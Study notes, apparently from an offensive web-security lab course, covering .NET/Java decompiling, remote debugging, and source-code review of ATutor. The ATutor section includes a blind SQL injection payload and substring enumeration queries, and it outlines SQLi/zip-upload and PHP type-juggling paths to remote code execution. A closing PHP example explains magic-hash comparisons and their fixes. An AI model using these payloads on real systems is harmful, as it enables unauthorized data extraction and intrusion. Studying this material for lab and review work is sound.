=========================================================================
Code Setups
.NET Code
RDP to service
xfreerdp +nego +sec-rdp +sec-tls +sec-nla /v:dnn /u:administrator /p:studentlab /size:1180x708
Compile Source Code
c:\Users\Administrator\Desktop>C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe test.cs
dnSpy - decompiler and debugger
- Download: https://github.com/dnSpy/dnSpy
- Main Code: Executables –> Program
- How to search?
- Open relevant modules in Program
- Search for ‘methods’
- Right click –> Analyze to find “Used by” and “Uses”
- How to modify assemblies?
- Building block of .NET applications. Can be EXE or DLL.
- Program –> Right Click “Edit Class” –> Modify Code –> Save All –> Save Module
Java Classes
Prerequisites
- Install JDK:
sudo apt install default-jdk
How to run Java code?
- Create source code –> test.java
- Create class file –>
javac -source 1.8 -target 1.8 test.java
- Create JAR file:
mkdir META-INF
echo "Main-Class: test" > META-INF/MANIFEST.MF
jar cmvf META-INF/MANIFEST.MF test.jar test.class
- Execute file:
java -jar test.jar
How to transfer Java files - Windows?
- Kali:
sudo impacket-smbserver test .
xfreerdp +nego +sec-rdp +sec-tls +sec-nla /v:manageengine /u:administrator /p:studentlab /size:1180x708
- Windows:
\\your-kali-machine-ip\test
JD-GUI - decompiler
- Search function
=======================================================================
Identifying source code vulnerabilities
- Unauthenticated areas
- Sanitisation of User Input
- Request parameters
- Identify how filters and sanitisation are performed –> Open source / Custom
- Databases
- Sanitised or parameterized queries?
- Account creation and password reset functionalities
- Interactions with the operating system –> Command injection
- Programming specific vulnerabilities
=======================================================================
Remote Debugging
Java
- Create launch.json in VSCode
- Add Configurations –> Java: Attach to Remote Program
- Debugging attach to 127.0.0.1:9898:
java -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=9898 -jar NumberGame.jar
=======================================================================
ATutor - PHP
Logging
Database Logging
sudo nano /etc/mysql/my.cnf –> general_log = 1
sudo systemctl restart mysql
sudo tail -f /var/log/mysql/mysql.log
PHP Enable Errors
/etc/php5/apache2/php.ini –> display_errors = On
sudo systemctl restart apache2
Code Review - SQLi + Zip File Upload to RCE
- Unauthenticated:
grep -rnw /var/www/html/ATutor -e "^.*user_location.*public.*" --color
- Search for functions:
grep -rnw /var/www/html/ATutor -e "function searchFriends" --color
- Self-defined functions:
$name = $addslashes($name);
- Blind SQL:
AAAA')/**/or/**/(select/**/1)=1%23
- Substring Enumeration:
select/**/(substring((select/**/version()),1,1))='4';
- ASCII Substring Enumeration:
select/**/ascii(substring((select/**/version()),1,1))=53;
- https://www.w3resource.com/mysql/string-functions/mysql-ascii-function.php
- Zip File Upload:
grep -ir "IMS manifest file is missing" /var/www/html/ATutor --color
Creating Python Script
from bs4 import BeautifulSoup
Code Review - Type Juggling to RCE
- String to integer type casting:
var_dump('0xAAAA' == '43690');
- http://php.net/manual/en/language.types.string.php#language.types.string.conversion
- Grep for SHA1/MD5 for magic hashes
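Added example (not from these notes or from ATutor) showing the loose-comparison behaviour behind the magic-hash issue, next to the strict checks a code review should expect; it assumes a PHP CLI and uses constructed "0e…" strings, not real digests.

```php
<?php
// Constructed values: two different strings that PHP treats as numeric strings
// in scientific notation ("0e" followed by digits). Both evaluate to float 0.0.
$stored   = '0e1234';
$supplied = '0e5678';

// Loose comparison (==) converts both sides to numbers, so they compare equal
// even though the bytes differ. This is the pattern to grep for around MD5/SHA1.
$loose = ($stored == $supplied);

// Strict comparison (===) compares type and bytes; hash_equals() does the same
// in constant time and is the right call for comparing digests.
$strict   = ($stored === $supplied);
$constant = hash_equals($stored, $supplied);

// The case from the notes: a hex string was numeric in PHP 5, so this was true
// there; PHP 7 dropped hex recognition and the comparison became false.
$hex = ('0xAAAA' == '43690');

// Vulnerable pattern a review would flag: digest compared with ==.
// Any password whose digest is "0e" + digits matches any stored "0e" + digits hash.
function check_weak(string $storedHash, string $password): bool
{
    return md5($password) == $storedHash;
}

// Hardened form: byte-exact, constant-time comparison of the two digests.
// (Unsalted MD5 itself should also be replaced with password_hash/password_verify.)
function check_strict(string $storedHash, string $password): bool
{
    return hash_equals($storedHash, md5($password));
}

var_dump($loose, $strict, $constant, $hex);
```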
